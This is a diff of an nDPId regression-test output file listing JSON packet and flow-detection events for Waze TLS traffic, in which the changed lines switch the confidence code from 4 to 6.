00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":360,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1435587878608,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587878608,"pkt":"ABoRAAACABoRAAABCABFAAAodR5AABAGgNKwIrq0CggAAQG7jdgTY55X7JxhqVAS\/\/+rXgAA"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":361,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1435587878609,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587878609,"pkt":"ABoRAAACABoRAAABCABFAAAoDkJAAEAGt64KCAABsCK6tI3YAbvsnGGpE2OeWFAQ\/\/+rXwAA"} -00992{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":362,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587878215,"flow_last_seen":1435587878781,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1550,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1435587878781,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39021,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} -01246{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":365,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587878215,"flow_last_seen":1435587878832,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2123,"flow_tot_l4_payload_len":3673,"flow_avg_l4_payload_len":459,"midstream":0,"thread_ts_msec":1435587878832,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39021,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} -00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":368,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587878606,"flow_last_seen":1435587878901,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587878901,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36312,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00992{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":362,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587878215,"flow_last_seen":1435587878781,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":1550,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1435587878781,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39021,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} +01246{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":365,"source":"waze.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587878215,"flow_last_seen":1435587878832,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2123,"flow_tot_l4_payload_len":3673,"flow_avg_l4_payload_len":459,"midstream":0,"thread_ts_msec":1435587878832,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"52.17.114.219","src_port":39021,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} +00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":368,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587878606,"flow_last_seen":1435587878901,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587878901,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36312,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":370,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587879018,"flow_last_seen":1435587879018,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587879018,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36314,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":370,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1435587879018,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587879018,"pkt":"ABoRAAACABoRAAABCABFAAA8CjxAAEAGu6AKCAABsCK6tI3aAbtwD3ouAAAAAKAC\/\/\/pMQAAAgQFtAQCCAoACHASAAAAAAEDAwg="} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1435587879020,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587879020,"pkt":"ABoRAAACABoRAAABCABFAAAodSNAABAGgM2wIrq0CggAAQG7jdqP8IXRcA96L1AS\/\/+rXAAA"} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":372,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1435587879020,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587879020,"pkt":"ABoRAAACABoRAAABCABFAAAoCj1AAEAGu7MKCAABsCK6tI3aAbtwD3ovj\/CF0lAQ\/\/+rXQAA"} -00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":375,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587878606,"flow_last_seen":1435587879181,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1012,"flow_tot_l4_payload_len":1194,"flow_avg_l4_payload_len":199,"midstream":0,"thread_ts_msec":1435587879181,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36312,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} -01247{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":377,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587878606,"flow_last_seen":1435587879233,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2479,"flow_tot_l4_payload_len":3673,"flow_avg_l4_payload_len":459,"midstream":0,"thread_ts_msec":1435587879233,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36312,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} -00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":383,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587879018,"flow_last_seen":1435587879574,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587879574,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36314,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":375,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587878606,"flow_last_seen":1435587879181,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1012,"flow_tot_l4_payload_len":1194,"flow_avg_l4_payload_len":199,"midstream":0,"thread_ts_msec":1435587879181,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36312,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} +01247{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":377,"source":"waze.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587878606,"flow_last_seen":1435587879233,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2479,"flow_tot_l4_payload_len":3673,"flow_avg_l4_payload_len":459,"midstream":0,"thread_ts_msec":1435587879233,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36312,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} +00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":383,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587879018,"flow_last_seen":1435587879574,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587879574,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36314,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":393,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587879850,"flow_last_seen":1435587879850,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587879850,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36316,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":393,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1435587879850,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587879850,"pkt":"ABoRAAACABoRAAABCABFAAA8Fw9AAEAGrs0KCAABsCK6tI3cAbueIGdrAAAAAKAC\/\/\/NjwAAAgQFtAQCCAoACHBkAAAAAAEDAwg="} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":394,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1435587879852,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587879852,"pkt":"ABoRAAACABoRAAABCABFAAAodS5AABAGgMKwIrq0CggAAQG7jdxh35iUniBnbFAS\/\/+rWgAA"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1435587879853,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587879853,"pkt":"ABoRAAACABoRAAABCABFAAAoFxBAAEAGruAKCAABsCK6tI3cAbueIGdsYd+YlVAQ\/\/+rWwAA"} -00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":396,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587879018,"flow_last_seen":1435587879855,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1012,"flow_tot_l4_payload_len":1194,"flow_avg_l4_payload_len":199,"midstream":0,"thread_ts_msec":1435587879855,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36314,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} -01247{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":398,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587879018,"flow_last_seen":1435587879907,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2479,"flow_tot_l4_payload_len":3673,"flow_avg_l4_payload_len":459,"midstream":0,"thread_ts_msec":1435587879907,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36314,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} -00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":400,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587879850,"flow_last_seen":1435587879958,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587879958,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36316,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01247{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":428,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587879850,"flow_last_seen":1435587880568,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3491,"flow_tot_l4_payload_len":3673,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1435587880568,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36316,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} +00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":396,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587879018,"flow_last_seen":1435587879855,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1012,"flow_tot_l4_payload_len":1194,"flow_avg_l4_payload_len":199,"midstream":0,"thread_ts_msec":1435587879855,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36314,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} +01247{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":398,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587879018,"flow_last_seen":1435587879907,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2479,"flow_tot_l4_payload_len":3673,"flow_avg_l4_payload_len":459,"midstream":0,"thread_ts_msec":1435587879907,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36314,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} +00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":400,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587879850,"flow_last_seen":1435587879958,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587879958,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36316,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01247{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":428,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587879850,"flow_last_seen":1435587880568,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3491,"flow_tot_l4_payload_len":3673,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1435587880568,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36316,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} 